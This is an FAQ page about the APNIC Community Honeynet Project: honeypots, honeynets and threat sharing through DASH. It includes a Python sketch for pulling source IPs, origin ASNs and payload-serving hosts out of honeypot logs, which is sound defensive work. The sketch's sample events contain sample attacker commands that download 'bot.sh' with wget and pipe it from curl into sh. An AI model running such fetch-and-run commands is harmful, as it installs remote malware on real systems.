Honeynet
What is the APNIC Honeynet Project, and why was it started?
The APNIC Community Honeynet Project was launched in 2019 to improve visibility into malicious activity targeting networks in the Asia Pacific region. By deploying honeypot sensors across diverse locations, the project collects data on suspicious traffic, malware, and attack patterns. This information supports APNIC Members, researchers, and the broader community in understanding threats and strengthening Internet security.
The APNIC Honeynet Project was established to:
- Enhance the capabilities of network engineers and security analysts by using honeypots to learn about cybersecurity.
- Share threat-related information with APNIC Members and relevant stakeholders in the security community.
- Collaborate with relevant partners in areas that can benefit the community.
The project contributes to global threat intelligence platforms and powers APNIC’s own tools, including DASH, helping Members monitor and respond to malicious traffic more effectively.
What are honeypots and honeynets?
A honeypot is a decoy system designed to attract attackers and observe their behaviour. It simulates vulnerable services to detect intrusion attempts and gather intelligence. A honeynet is a distributed network of honeypots that increases the volume and diversity of data collected.
Honeypot systems have no production value, so any activity going to or from a honeypot is likely a probe, attack, or attempt to compromise. Once a compromised device or attacker connects to a honeypot, analysts can collect observables such as source IP addresses, hosts serving malicious code, or techniques for gaining a foothold on the honeypot. These insights help analysts understand the broader context of an attack.
Together, honeypots and honeynets help study attacker tools and tactics, and detect both global and localized threats targeting specific IP ranges or Autonomous System Numbers (ASNs).
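As an added illustration (not code from APNIC or the Honeynet Project), the sketch below pulls the observables mentioned above out of honeypot session records: source IP addresses, hosts serving malicious code, and sources grouped by origin AS. The record fields, the sample events, and the prefix-to-ASN table are constructed assumptions that use documentation address ranges and ASNs.

```python
import ipaddress
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed prefix-to-origin-AS table (documentation prefixes and ASNs).
PREFIX_TO_ASN = {
    ipaddress.ip_network("192.0.2.0/24"): 64496,
    ipaddress.ip_network("198.51.100.0/24"): 64497,
}

# Constructed honeypot session records; the field names are hypothetical.
SAMPLE_EVENTS = """\
{"src_ip": "192.0.2.10", "service": "ssh", "input": "uname -a"}
{"src_ip": "192.0.2.10", "service": "ssh", "input": "wget http://203.0.113.5/bot.sh -O /tmp/b"}
{"src_ip": "198.51.100.7", "service": "telnet", "input": "curl -s http://203.0.113.5/bot.sh | sh"}
{"src_ip": "192.0.2.44", "service": "ssh", "input": "cat /proc/cpuinfo"}
not-json garbage line
"""

URL_RE = re.compile(r"https?://[^\s'\"|;]+")

def origin_asn(ip):
    """Longest-prefix match of ip against the table; None if no prefix covers it."""
    addr = ipaddress.ip_address(ip)
    matches = [n for n in PREFIX_TO_ASN if addr in n]
    if not matches:
        return None
    return PREFIX_TO_ASN[max(matches, key=lambda n: n.prefixlen)]

def extract_observables(lines):
    """Return (source IPs per origin AS, payload-serving hosts -> source IPs)."""
    by_asn = defaultdict(set)
    payload_hosts = defaultdict(set)
    for line in lines.splitlines():
        try:
            event = json.loads(line)
            src = event["src_ip"]
            asn = origin_asn(src)
        except (ValueError, KeyError, TypeError):
            continue  # skip malformed records rather than abort the run
        by_asn[asn].add(src)
        for url in URL_RE.findall(event.get("input", "")):
            host = urlsplit(url).hostname
            if host:
                payload_hosts[host].add(src)
    return dict(by_asn), dict(payload_hosts)
```

Because a honeypot has no production traffic, every source in the per-AS result is a candidate for follow-up with the network that originates it, and a host that several unrelated sources fetch from is a stronger indicator than any single session.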
How can I benefit from the APNIC Honeynet Project?
If you’re an APNIC Member, you can access threat intelligence derived from the Honeynet Project through tools like DASH. This data helps you:
- Monitor malicious traffic coming from your network.
- Understand the nature and origin of attacks.
- Improve your security posture, incident response, and remediation.
DASH also provides insights into threats by origin-AS, and APNIC offers support to help Members interpret and act on this data. Information from the Honeynet Project is also shared with security organizations to the benefit of the wider Internet community.
How can I get involved in the APNIC Honeynet Project?
You can contribute to the Honeynet Project by:
- Participating in threat sharing sessions and security events.
- Collaborating on data analysis and infrastructure development.
The project also supports hands-on training using real-time data, packet capture files, and logs, and can be especially valuable for small and underserved economies.
If you would like to learn more, contact project@honeynet.asia